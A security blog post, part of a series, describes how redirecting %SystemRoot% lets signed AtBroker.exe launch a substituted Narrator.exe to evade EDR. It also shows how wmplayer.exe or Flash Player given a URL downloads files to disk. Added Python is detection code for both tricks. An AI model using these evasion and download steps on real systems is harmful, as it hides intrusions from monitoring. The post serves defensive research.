Running programs via Proxy & jumping on an EDR-bypass trampoline, Part 4

Here’s yet another subclass of tricks one can use to distort the process tree seen by EDR and sandbox solutions.

Many Windows programs launch other Windows programs that are native to the OS. They do so carefully, typically launching them from %SystemRoot%. Many of them use GetSystemDirectory to build the path, but quite a few still rely on the environment variable, which they resolve with the ExpandEnvironmentStrings API to obtain the actual path.

Changing that environment variable, copying the required files to the redirected location and replacing the target application there lets us launch a payload of choice while making it look as if it was executed by a signed binary.

Example:

In this old post I mentioned AtBroker. When you launch it from a command line without any arguments, it simply launches Narrator.exe.

We can:

  • create a test folder
  • change the SystemRoot to point to it
  • copy all the necessary files from the original system32 and Registration folder (procmon helps)
  • launch atbroker.exe
  • the narrator.exe payload will be executed

This launches C:\Test\System32\Narrator.exe:
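From the defender's side, the two things worth checking after reading the explanation above (ExpandEnvironmentStrings-based path building) and the AtBroker walk-through are (a) whether a known OS binary name is executing from outside the genuine system directories, since a copied binary keeps a valid signature and only its path gives it away, and (b) whether a process's %SystemRoot% disagrees with what the OS reports via GetSystemDirectory. The Python below is an added example, not code from the original post; the event records, the allowlist of system directories and the two-entry watchlist are constructed for the demo, and the live check only runs on Windows.

```python
import ctypes
import ntpath
import os
import sys

# Constructed allowlist: directories from which Windows-native binaries are
# expected to run. Paths are compared case-insensitively after normalisation.
GENUINE_SYSTEM_DIRS = {r"c:\windows", r"c:\windows\system32", r"c:\windows\syswow64"}

# Constructed watchlist: OS binaries whose relocation this demo cares about.
# AtBroker.exe and Narrator.exe are the pair discussed in the post.
WATCHED_OS_BINARIES = {"atbroker.exe", "narrator.exe"}


def _norm(path):
    """Normalise a Windows path for comparison (ntpath works on any host)."""
    return ntpath.normpath(path).lower()


def is_relocated_os_binary(image_path):
    """True when a watched OS binary name runs from outside a genuine system directory.

    The Authenticode signature of a copied binary stays valid, so the image
    path, not the signature, is what exposes the relocation.
    """
    name = ntpath.basename(_norm(image_path))
    if name not in WATCHED_OS_BINARIES:
        return False
    return ntpath.dirname(_norm(image_path)) not in GENUINE_SYSTEM_DIRS


def systemroot_mismatch(env, real_system_dir):
    r"""Compare a process's %SystemRoot% with the directory the OS itself reports.

    real_system_dir is what GetSystemDirectory returns (e.g. C:\Windows\System32);
    its parent is the genuine SystemRoot. A missing or different value means the
    process resolves %SystemRoot%-based paths somewhere else.
    """
    system_root = env.get("SystemRoot")
    if system_root is None:
        return True
    return _norm(system_root) != ntpath.dirname(_norm(real_system_dir))


def live_systemroot_check():
    """On Windows, ask kernel32 for the real system directory and compare it
    with this process's own environment. Returns None on other platforms."""
    if sys.platform != "win32":
        return None
    buf = ctypes.create_unicode_buffer(260)
    ctypes.windll.kernel32.GetSystemDirectoryW(buf, len(buf))
    return systemroot_mismatch(dict(os.environ), buf.value)


# Constructed process-creation events in the shape of Sysmon Event ID 1 records.
# Events 3 and 4 reproduce the C:\Test\System32 redirection described in the post.
SAMPLE_EVENTS = [
    {"id": 1, "Image": r"C:\Windows\System32\AtBroker.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"id": 2, "Image": r"C:\Windows\System32\Narrator.exe",
     "ParentImage": r"C:\Windows\System32\AtBroker.exe"},
    {"id": 3, "Image": r"C:\Test\System32\AtBroker.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"id": 4, "Image": r"C:\Test\System32\Narrator.exe",
     "ParentImage": r"C:\Test\System32\AtBroker.exe"},
]


def scan_process_events(events):
    """Return {event id: [reasons]} for events whose image or parent is a relocated OS binary."""
    findings = {}
    for ev in events:
        reasons = []
        for field in ("Image", "ParentImage"):
            if is_relocated_os_binary(ev[field]):
                reasons.append(f"{field} {ev[field]} is outside a genuine system directory")
        if reasons:
            findings[ev["id"]] = reasons
    return findings


if __name__ == "__main__":
    for event_id, reasons in scan_process_events(SAMPLE_EVENTS).items():
        print(event_id, "; ".join(reasons))
    print("live SystemRoot mismatch:", live_systemroot_check())
```

The path rule fires on both the relocated AtBroker and the Narrator it spawns, so the whole redirected chain is visible even though each image carries a valid Microsoft signature; in production the watchlist would be the full set of binaries shipped in System32 rather than two names.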

Downloading off the land

There are many documented ways to use legitimate applications to download stuff from the net.

Here are two more:

  • wmplayer.exe <URL>
  • FlashPla.exe <URL>

When executed, they download the file pointed to by the URL, save it to the browser cache folder, e.g. %USERPROFILE%\AppData\Local\Microsoft\Windows\INetCache\IE, and… fail to play it as media.

But the files will remain on the system…

The first one is pretty obvious – it’s just Windows Media Player, and it’s present natively on many systems.

The second one – FlashPla.exe – is your good ol’ Adobe Flash Player; you will find it all over the place, as it ships with many drivers and tools accompanying various peripheral devices. It may not be called FlashPla (other names I came across are CL_Gallery.exe, FlashPlayer.exe, cs3flashplayer.exe, SAFlashPlayer.exe), but it’s pretty easy to find.

Example locations:

  • c:\Program Files (x86)\CyberLink\Power2Go\Gallery\CL_Gallery.exe
  • c:\Program Files (x86)\HP\Digital Imaging\help\player\FlashPla.exe
  • C:\Program Files\HP\Digital Imaging\help\player\FlashPla.exe
  • C:\ProgramData\LG\LG LIP2230\Help\flash\FlashPla.exe
  • C:\Program Files\Macromedia\Flash 5\Players\FlashPla.exe
  • C:\Program Files\FlashJester\Jugglor v30\Projector Files\CS3FlashPlayer.exe

Both players open windows and are pretty noisy (e.g. in the Registry), but it’s always worth documenting the possibilities…
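Two cheap detections follow directly from the behaviour described for wmplayer.exe and the Flash Player variants: a media or Flash player started with a URL on its command line, and a file landing in the INetCache folder from a process that is not a browser. The Python below is an added example and not code from the original post; the player watchlist is taken from the names listed above, while the browser allowlist, the cache-folder fragment and the Sysmon-like event records are constructed for the demo.

```python
import ntpath
import re

# Matches the first URL on a command line; sufficient for process-creation telemetry.
URL_RE = re.compile(r"""\b(?:https?|ftp)://[^\s"']+""", re.IGNORECASE)

# Watchlist built from the downloader names given in the post.
PLAYER_NAMES = {"wmplayer.exe", "flashpla.exe", "flashplayer.exe",
                "cl_gallery.exe", "cs3flashplayer.exe", "saflashplayer.exe"}

# Constructed allowlist of processes expected to write into the IE cache.
BROWSER_NAMES = {"iexplore.exe", "msedge.exe", "chrome.exe", "firefox.exe"}

# Lower-cased fragment of the cache folder named in the post.
INETCACHE_FRAGMENT = r"\appdata\local\microsoft\windows\inetcache"


def basename(path):
    return ntpath.basename(ntpath.normpath(path)).lower()


def player_with_url(event):
    """Return the URL if a watched player was started with one, else None."""
    if event["type"] != "ProcessCreate" or basename(event["Image"]) not in PLAYER_NAMES:
        return None
    m = URL_RE.search(event["CommandLine"])
    return m.group(0) if m else None


def non_browser_cache_write(event):
    """True when something other than a browser creates a file under INetCache."""
    if event["type"] != "FileCreate":
        return False
    in_cache = INETCACHE_FRAGMENT in ntpath.normpath(event["TargetFilename"]).lower()
    return in_cache and basename(event["Image"]) not in BROWSER_NAMES


# Constructed events shaped like Sysmon Event ID 1 (ProcessCreate) and 11 (FileCreate).
# example.invalid is a reserved name, so nothing here points at a real host.
SAMPLE_EVENTS = [
    {"id": 1, "type": "ProcessCreate",
     "Image": r"C:\Program Files\Windows Media Player\wmplayer.exe",
     "CommandLine": r'"C:\Program Files\Windows Media Player\wmplayer.exe" http://example.invalid/drop.bin'},
    {"id": 2, "type": "ProcessCreate",
     "Image": r"C:\Program Files\HP\Digital Imaging\help\player\FlashPla.exe",
     "CommandLine": r"FlashPla.exe https://example.invalid/drop.swf"},
    {"id": 3, "type": "ProcessCreate",
     "Image": r"C:\Program Files\Windows Media Player\wmplayer.exe",
     "CommandLine": r'"C:\Program Files\Windows Media Player\wmplayer.exe" "C:\Users\alice\Music\song.mp3"'},
    {"id": 4, "type": "FileCreate",
     "Image": r"C:\Program Files\Windows Media Player\wmplayer.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Local\Microsoft\Windows\INetCache\IE\AB12CD34\drop[1].bin"},
    {"id": 5, "type": "FileCreate",
     "Image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Local\Microsoft\Windows\INetCache\IE\AB12CD34\page[1].htm"},
]


def scan_download_events(events):
    """Return (event id, rule name, detail) triples for every event matching either rule."""
    findings = []
    for ev in events:
        url = player_with_url(ev)
        if url:
            findings.append((ev["id"], "player-launched-with-url", url))
        if non_browser_cache_write(ev):
            findings.append((ev["id"], "non-browser-inetcache-write", ev["TargetFilename"]))
    return findings


if __name__ == "__main__":
    for event_id, rule, detail in scan_download_events(SAMPLE_EVENTS):
        print(event_id, rule, detail)
```

The command-line rule is the stronger of the two, since a local media file (event 3) never trips it, while the cache-write rule catches the artefact the post says remains on disk even when the command line was not logged.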